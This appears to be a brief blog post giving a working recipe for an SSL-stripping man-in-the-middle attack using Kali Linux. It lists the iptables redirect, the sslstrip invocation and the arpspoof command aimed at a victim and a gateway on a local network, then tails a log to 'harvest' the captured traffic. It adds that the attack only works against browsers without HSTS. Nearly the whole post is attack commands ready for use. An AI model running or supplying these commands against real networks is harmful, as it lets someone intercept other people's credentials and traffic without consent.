Comment: The following experimentation works well with Kali 2018.1. The reason why I don't use the newest version, namely 2020.X, is because the newest version has no sslstrip by default, and is tough to install python-twisted-web, which is required by sslstrip.
Running (In this case, 192.168.0.19 is the victim, 192.168.0.1 is the gateway, and TCP8080 is the listening port) :
# sysctl net.ipv4.ip_forward=1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -a -f -l 8080 -w /root/sslstrip.log
Open a new terminal and type:
# arpspoof -i eth0 -t 192.168.0.19 -r 192.168.0.1
Harvest:
Open a new terminal and type:
# tail -n 30 -f /root/sslstrip.log
P.S.: This experimentation only succeeds when the victim's browser does not support HSTS.
No comments:
Post a Comment